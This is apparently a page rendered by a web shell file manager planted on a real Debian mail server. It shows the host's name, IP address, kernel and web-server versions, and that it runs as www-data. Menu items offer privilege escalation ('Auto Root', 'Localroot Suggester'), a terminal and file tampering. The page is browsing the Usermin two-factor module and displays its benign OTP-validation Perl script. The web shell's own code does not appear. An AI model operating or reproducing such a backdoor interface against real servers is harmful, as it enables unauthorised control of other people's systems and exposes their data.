Linux mail.vriendennsm.nl 6.1.0-51-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.177-1 (2026-07-16) x86_64
Apache/2.4.68 (Debian)
Server IP : 217.154.75.17 & Your IP : 216.73.216.195
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
usermin /
twofactor /
Delete
Unzip
Name
Size
Permission
Date
Action
lang
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
ulang
[ DIR ]
drwxr-xr-x
2026-07-25 20:55
enable.cgi
1.93
KB
-rwxr-xr-x
2026-07-19 16:28
index.cgi
1.45
KB
-rwxr-xr-x
2026-07-19 16:28
module.info
157
B
-rw-r--r--
2026-07-19 16:26
module.info.pl
107
B
-rw-r--r--
2026-07-19 16:26
qr.cgi
439
B
-rwxr-xr-x
2026-07-19 16:28
twofactor-funcs-lib.pl
11.24
KB
-rw-r--r--
2026-07-19 16:26
twofactor-lib.pl
101
B
-rw-r--r--
2026-07-19 16:26
twofactor.pl
695
B
-rwxr-xr-x
2026-07-19 16:28
Save
Rename
#!/usr/bin/perl # Validate the OTP for some Usermin user $main::no_acl_check = 1; $main::no_referers_check = 1; $ENV{'WEBMIN_CONFIG'} = "/etc/usermin"; $ENV{'WEBMIN_VAR'} = "/var/usermin"; if ($0 =~ /^(.*\/)[^\/]+$/) { chdir($1); } require './twofactor-lib.pl'; $module_name eq 'twofactor' || die "Command must be run with full path"; # Check command-line args @ARGV == 5 || die "Usage: $0 user provider id token api-key"; ($user, $provider, $id, $token, $apikey) = @ARGV; # Call the provider validation function $func = "validate_twofactor_".$provider; $err = &$func($id, $token, $apikey); if ($err) { $err =~ s/\r|\n/ /g; print $err,"\n"; exit(1); } else { exit(0); }